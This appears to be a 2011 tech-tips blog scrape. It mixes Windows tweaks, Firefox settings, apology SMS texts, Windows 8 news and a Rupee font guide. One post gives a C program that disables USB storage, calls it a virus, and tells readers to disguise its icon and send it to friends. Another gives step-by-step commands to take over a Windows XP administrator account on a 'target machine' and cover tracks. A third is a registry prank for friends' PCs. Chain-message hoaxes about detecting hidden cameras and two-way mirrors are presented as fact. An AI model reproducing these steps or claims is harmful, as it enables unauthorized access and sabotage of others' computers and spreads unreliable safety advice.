Powered By Blogger

Friday, September 30, 2011

A Program to block and unblock USB Ports

Here is the source code of C programming language which will block the USB ports of the computer. In other ways u can say that this is a small virus program to disable USB ports of the computer.

#include <stdio.h>
#include <conio.h>
void main()
{
 system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v     Start \/t REG_DWORD \/d 4 \/f");
 getch();
}

Now you need copy the above given C source code in your text editor of compiler like Visual C++ or Borland C++ or any other compiler which you have installed in your computer. Now compile the the given C source code and then, you will see a block_usb.exe file created in your folder. Now apter you run that block_usb.exe file (application) then all the USB ports of your computer will be blocked and it will not be able to work anymore. You can notice this effects apter you reboot your computer.
You might be afraid to run this application in your computer, if your computer USB will not work furthermore. Keeping this things i have also written a C source code to again enable your blocked USB ports. Here below is the C source code for again enable your blocked USB ports.

#include <stdio.h>
#include <conio.h>
void main()
{
 system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
 getch();
}

Again copy these above C source code and compile with your compiler, you will see unblock_usb.exe file created in your folder. now if you will run that exe file application all the blocked USB ports of your computer will be working again.
The icon of your created exe file may not look attractive to your friends if you send them through mail. So that your friends will click on your virus program you need to change the icon of that file. Make attractive icon and then send through yahoo chat or by any means.

Automatically Delete Temporary Files In Windows 7

Are you getting tensed for deleting temporary files? You might be feeling hectic deleting temporary files manually at every time intervals. Moreover if you have laptop and you have very less hard disk space then you might be tensed about the temporary files. In this article I am going to write about the tips for deleting temporary files automatically.
Windows 7 comes with the Disk Clean-up Wizard like Windows vista and windows XP, but that utility only deletes your temporary files if they are more than a week old. But very few of us know that by applying simple trick, you can automate the process by creating a simple batch file and then making it run at start-up so that you never have to worry about manually freeing (deleting) up space from your Temp folder.
For that follow the below process:
• Open Notepad and then click on File >Save As.
• In the file name dialogue box, Type “tempclean.bat”
• Now change the entry in Save As Type dropdown box to “All files”.
• Then click on save.
• Then in your file, type the following:
cd C:\Users\%username%\AppData\Local
Rmdir/S/Q Temp
• Save the file
• Now navigate to the folder where the file is saved.
• No right click on it and click on ‘Create Shortcut’.
• Place this shortcut in your ‘startup’ folder in your start Menu. (If you don’t know how to add to startup menu then see below of this post).
Voila! You are done. Now, every time you log in to Windows, the file will be executed automatically and your temporary files will be cleaned. This is very useful for notebooks and laptops with small hard-disk space.
In case you get an access error while the file is being executed, replace %username% with your windows login username.
This trick works as self defense antivirus which will delete your temporary files automatically on every startup of your computer.

How to add shortcut to start up menu
• Click on start button
• Now click on all programs.
• Now right click the startup and open in new windows.
• Now drag the shortcut of any file or application to this folder.
• That’s all you are done. Now whenever your computer start the file will be automatically executed.

Hope this trick helps you. Queries and comments are most welcome!

Some useful commands’ shortcut..

Normally you would not associate windows with commands. For everything, you have to navigate through a couple of menu using the mouse before getting to the concerned window/utility/tool etc. but windows does come with commands that give you quick access to tools for configuring and fixing our computer. Some of these are very helpful if you prefer the use of keyboard more than your mouse and don’t like moving your hand back and forth between them or suddenly the touchpad of your laptop stops working/ behaves erratically. Just press press win + R to get the Run command dialog box to get started.
·         %temp%    temporary files folder. Your recently downloaded files, unzipped setup packages, etc will b e present here.
·         Appwiz.cpl               add or remove programs window for uninstalling applications.
·         Hdwwiz.cpl              Add hardware wizard for connecting any new piece of equipment for recently connected to your computer.
·         Fsquirt                        Bluetooth file transfer wizard for sending and receiving files fom your Bluetooth enabled mobile phone/PMP
·         Calc              This will open compute calculator.
·         Chrmap      Character map for inserting special characters such s copyright and trademark symbol.
·         Chkdsk       check disk utilioty.
·         Devmgmt.msc         Device manager for troubleshooting hardware.
·         Cleanmgr                  disk cleanup utility for cleaning up your temporary files and retrieving wasted hard disk space.
·         Dfrg.msc                    disk defragment utility.
·         Diskmgmt.msc        disk management to help you manage your hard disk partitions and removable storage devices.
·         Diskpart                     disk partition manager.
·         Desk.cpl                     display properties for changing display resolutions
·         Gpedit.msc              Group policy editor.
·         Ciadv.msc                 indexing service settings.
·         Inetcpl.cpl                                         internet properties. Very useful and helpful you want to change your proxy setting without going through Internet Explorer
·         Iexplore                     open internet explorer.
·         Logoff                         log off from your account.
·         Main.cpl                    open mouse properties.
·         Main.cpl keyboard                                open keyboard properties.
·         Ncpa.cpl                    network connections window to manage your networks.
·         Netsetup.cpl           network setup wizard to create an ad hoc network among other things.
·         Notepad                    notepad
·         Perfmon                    performance monitor.
·         Powercfg.cpl           power management to change power profiles
·         Regedit                      registry editor
·         Services.msc            service to disable unused service and boost computer speed. We, however, recommend you not to play around with this, unless you are an advanced user.
·         Fsmgmt.msc            opem shared folders
·         Shutdown                 shutdown windows
·         Msconfig                   System configuration Utility, mainly used to change boot options and disable startup items
·         Sysdm.cpl                 display system properties.
·         Taskmgr                     task manager for killing processes that are not responding and monitoring resource usage.
·         Firewall.cpl              windows firewall.

Faster Windows Shutdown...




Some time windows take too much time to kill the process or stop service once you give the Shutdown command. But, in most of the case you see it took a long time for shutting down windows. So in this article I am going to write about the simple trick through which you will be able to boost up your shutdown time. In most of the case it does not harm your system when you reduce the shutdown time.
·         Go to start
·         Run and type regedit
·         .Now navigate to HKEY_LOCAL_MACHINE > SYSTEM > Currentcontrolset > Control in the left pane.
·         .Now In the right pane, right click on the key called ‘WaitToKillServiceTimeout’ and click on modify.
·         .Now you need to change the value data from 12000 (that is 12 seconds) to 5000 (that 5 seconds). To be on the safe side do not reduce below 5 seconds because some of the programs need a couple of seconds to close properly and killing before that may results in data loss.
That’s all, now restart your PC and afterwards you will notice the change. Please don’t play with registry files if you are not advanced user. Your system may crash if you change registry files everywhere. Know what you are doing else it may harm you. Have fun!!

Tuesday, September 27, 2011

No Shutdown:.............:D

No Shutdown:.............:D
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Monday, September 26, 2011

How to hack windows XP admin password


How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Saturday, September 24, 2011

BST SRY SMS..:(




What I Did Was Foolish & Impulsive
If I Cud Take It All Back I'd Do This So Instant
I Truly Didn't Mean To Hurt You In Any Way
I'm Sorry For Hurting You


By: chocolaty boy
In Sorry SMS
Like [268]SMS to Mobile
know I’ve hurt u…

I didn’t mean to.

I am soooooooooo sorry…

Please forgive me!


By: hamada
In Sorry SMS
Like [228]SMS to Mobile
Sorry is a gud weapons for some people..
Jaan bujh kar galtiaan karo, n after that just say sorry..
but actually people don't know the deep meaning of sorry....!!


By: www.rrathi.tk
In Sorry SMS
Like [168]SMS to Mobile
if i have ever done a mistake,
4give me thinking that it was a mistake...
and dont ever 4get me even by a mistake....


By: nill
In Sorry SMS
Like [240]SMS to Mobile
Be the first one to say Sorry when the other person seems to be hurt bcoz of U & Be the 1st one to forgive if a Person says Sorry to U!


By: munna
In Sorry SMS
Like [132]SMS to Mobile
A Good Apology has 3 Parts - 1) Im Sorry.. 2) It’s my Fault.. 3) How do I make it right? well.. unfortunately, A Lot of people usually miss the 3rd part..


By: munna
In Sorry SMS
Like [175]SMS to Mobile
Sorry is not just a word to say... Its a expression to express for a unfortunate event that experienced....


By: Deepu
In Sorry SMS
Like [127]SMS to Mobile
saying sorry is the purest cure of all heart aches and heart breaks! Admit to yourself that you have done wrong and say sorry. It does not only touches the heart but also touches the soul. It's the greatest thing to do that will give you the greatest feeling to enjoy. :)


By: rahulsinghal
In Sorry SMS
Like [114]SMS to Mobile
I'm sorry may not mean that much to you, but it means a lifetime of our relationship to me ! Please forgive me ?


By: jay
In Sorry SMS
Like [233]SMS to Mobile
Begano se dosti ki gunjais nahi hoti,
Mout ke badh koi khavaish nahi hoti.
Saayad koi pyaar bhara dil tuta hoga,
Warna November ke mahine mein barish nahi hoti.
I am sorry!!!


By: yugant
In Sorry SMS
Like [198]SMS to Mobile

TOP 40 BIKE WALLPAPER 4..U










































http://in.news.yahoo.com/photos/tata-pixel-a-cool-city-car-concept-1315380970-slideshow/

Today i am gonna show u how to speed up Mozilla Firefox to 1000000x time



Today i am gonna show u how to speed up Mozilla Firefox to 1000000x time
lets follow the steps:
first
open fire fox and type in address bar
"about:config" then press enter
then it will show little warning ,click on
i will be careful

right click anywhere the page then
click on new -->string then a window will apper write in this window
"nglayout.initial.paint " then ok then put its value 00
third
right click anywhere the page then
click on new -->string then a window will apper write in this window
"content.notify.delay" then ok then put its value 00


Step_3: In the filter bar below the address bar type network.http.

Step_4: Double-click on "network.http.pipelining" to change the setting from false to true.

Step_5: Double-click on "network.http.proxy.pipelining" to change the value from false to true.

Step_6: Double-click on "network.http.pipelining.maxrequests" and change the number to "30". This means it will make 30 requests at once.
(Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.)

Step_7: Several lines above network.http.proxy.pipelining you’ll see
"network.http.max-persistant-connections-per-proxy" and
"network.http.max-persistant-connections-per-server".
Double-click each line and change the value to "8".

Step_8: Two lines up locate and double-click on "network.http.max-connections" and set the value to "48".

Step_9: Now right-click (control-click on a Mac) anywhere in the configuration (the area where you’ve been making the changes). Select "New" then "Integer".

Step_10: When prompted, copy and paste or type the following into the field provided: nglayout.initialpaint.delay.

Step_11: When prompted to add a value, enter the number "0". This value is the amount of time the browser waits before it acts on information it recieves.

Step_12: Close all windows and tabs. The changes will take effect when you restart Firefox
These changes allow Firefox to make multiple server connections and will speed up page downloads for better, more efficient use of your broadband connection. If you're using a broadband connection you'll load pages MUCH faster now...
Reply With Quote

Saturday, September 17, 2011

Read This Message.....!!!! 

How to Detect Hidden Camera in Trial Room?

In front of the trial room take your mobile and make sure that mobile can make calls........
Then enter into the trail room, take your mobile and make a call.....
If u can't make a call......!!!!
There is a hidden camera......
This is due to the interference of fiber optic cable during the signal transfer......

Please forward this to your friends to educate this issue to the
public......To prevent our innocent ladies from HIDDEN CAMERA...........

Pinhole Cameras in Changing Rooms of Big Bazaar, Shoppers Stop?

A few days ago, I received this text message:
Please don't use Trial room of BIG BAZAAR there are pinhole cameras to make MMS of young girls.
So, please forward to all girls. Also forward to all boys who have sisters and girlfriends.

Don't be shy in forwarding this message. Because its about protecting the integrity of all girls & ladies.

HOW TO DETECT A 2-WAY MIRROR?

When we visit toilets, bathrooms, hotel rooms, changing rooms, etc., How many of you know for sure that the seemingly ordinary mirror hanging on the wall is a real mirror, or actually a 2-way mirror I.e., they can see you, but you can't see them. There have been many cases of people installing 2-way mirrors in female changing rooms or bathroom or bedrooms.

It is very difficult to positively identify the surface by just looking at it. So, how do we determine with any amount of certainty what type of Mirror we are looking at?

CONDUCT THIS SIMPLE TEST:

Place the tip of your fingernail against the reflective surface and if there is a GAP between your fingernail and the image of the nail, then it is a GENUINE mirror.

However, if your fingernail DIRECTLY TOUCHES the image of your nail, then BEWARE, IT IS A 2-WAY MIRROR! (There may be someone seeing you from the other side). So remember, every time you see a mirror, do the "fingernail test." It doesn't cost you anything. It is simple to do.

This is a really good thing to do. The reason there is a gap on a real mirror, is because the silver is on the back of the mirror UNDER the glass.

Whereas with a two-way mirror, the silver is on the surface. Keep it in mind! Make sure and check every time you enter in hotel rooms.

Share this with your sisters, wife, daughters, friends, colleagues, etc.

Wednesday, September 07, 2011

New Windows 8 Features

Preview New Windows 8 Features [Videos]

Windows 8 Copy Paste

Windows 8 will present all pending copy jobs in this single dialog, instead of multiple floating pop ups. Now you can also pause, resume, and stop each copy operation in progress and get contol over which copy jobs to complete first. Also note each copy job in progress shows the speed of data transfer, the transfer rate trend, and how much data in left to transfer in a neat chart for a great visual assessment.
Also when 2 files have a similar file name, now Windows 8 has a new approach to conflict resolution. All source files are on the left and target location files on right in one single dialog screen and you can choose which file to keep in one extended screen.

 

Windows 8 USB 3.0 Support

Microsoft foresees that by 2015, all new PCs will offer USB 3.0 ports. USB 3.0 will be 10 times faster than USB 2.0 with improved power management that results in longer battery life. Transferring your heavy HD movies will be much faster and will save much time. See how Windows 8 plans to incorporate USB 3.0

Download Free Indian Rupee Font

The new Indian Rupee symbol is officially accepted and now download free India Rupee fonts for your documents.

How to Download and Install India Rupee Font

Fordian Technologies has created the new Indian rupee font for free download. Its simple to use.
  1. Indian rupee fontDownload the Rupee font (.ttf file) and install in your computer fonts folder (typically C:\Windows\Fonts).
  2. Select “Rupee” font from the drop down list of your fonts in your application
  3. The grave acent symbol – ` (the key just above “tab” button in your keyboard) is used to type the new Rupee symbol.
Run the video below (in full screen) for a step-by-step view to install the Rupee font.
Update: You can download Rupee font installer free here.
Update: How to Add India Rupee Font Symbol in Blog Posts
Update: Now get a dedicated Indian rupee keyboard key too.
I am sure you want to insert the new India Rupee font symbols Rs. in your WordPress blog posts. You can download Rupee font or use the Rupee font installer, and it would display well in your Microsoft Word documents, but if you try the same in your blog posts it would not work.
After the Indian Government approved the new Indian currency symbol, many services are actively working to integrate the rupee font online. WebRupee has introduced a Web API for the Rupee symbol font which provides a simple, cross browser method for using the Rupee symbol on your webpage, blog or anywhere on the web.

Javascript Method to Add Rs. Rupee Font Symbol

This the best automated method. Simply cut and paste the javascript code below to your website footer file and it will convert ALL Rs symbols to Rs. Rupee font symbols on all your blog posts.
<script src="http://cdn.webrupee.com/js" type="text/javascript"></script>

CSS Method to Add Rs. Rupee Font Symbol

If javascript is not your style, then simply cut and paste the stylesheet code below to your website <head> area and it will convert all Rs symbols to Rupee font symbols wherever the span tags are found around the Rs text
Add this CSS stylesheet
<link rel="stylesheet" type="text/css" href="http://cdn.webrupee.com/font">
Wherever you want to convert the Rs. –  add the span tags and use the Webrupee class to call the CSS.
<span class="WebRupee">Rs.</span>

How do we implement Rs. Rupee Symbol on our site?

Since we have limited use of the Rupee symbol on our WordPress blog, we don’t want to load javascript or call external stylesheets on all pages.
We pasted the CSS and span code on selected articles like this in html format, and you can see the Rs. symbol right now working on this post.

 

How to Type Indian Rupee Symbol using Keyboard Keys

 

How can you type Rs. Indian rupee symbol from your existing keyboard keys? The new Indian rupee symbol is a hit, but many find usage difficult because there is no rupee keyboard key.
Right now you can download rupee font and use the symbol in your office documents easily. Webmasters can easily use rupee symbol online and add the rupee symbol to articles easily (like in this article). But what about having a direct keyboard key.

Type Rs. Indian Rupee Symbol

The Unicode Technical Committee has approved a code position for the Indian Rupee Symbol Rs., which means it will be available in modern keyboards soon and can be easily used across mobile phones and various web services. But till that happens, the amazing people at Foradian have a nice tutorial guiding you how to map the rupee symbol to a key in your keyboard.
rupee keyboard
  • Download the Rupee Keyboard file (.zip) and extract the files
  • Double click Rupee Installer.exe file and follow the instructions – now 4 new fonts will install to your computer with support for new rupee symbol in Unicode recommended code position
  • Double click Keyboard Install.exe file - a new keyboard layout is installed in your computer. Right click on the task bar and select language bar from the toolbars menu > click on small keyboard icon and enable the Rupee Foradian Keyboard Layout
  • Now you can use the grave accent key on the keyboard to type the rupee symbol by selecting the Rupee Foradian Standard fonts

Install Rupee Keyboard

Here is a step by step video about how they install the rupee keyboard.
If you set Rupee Foradian Standard as the default font in your browser, you can easily use the Rs. rupee symbol in any applications like gmail, twitter or facebook.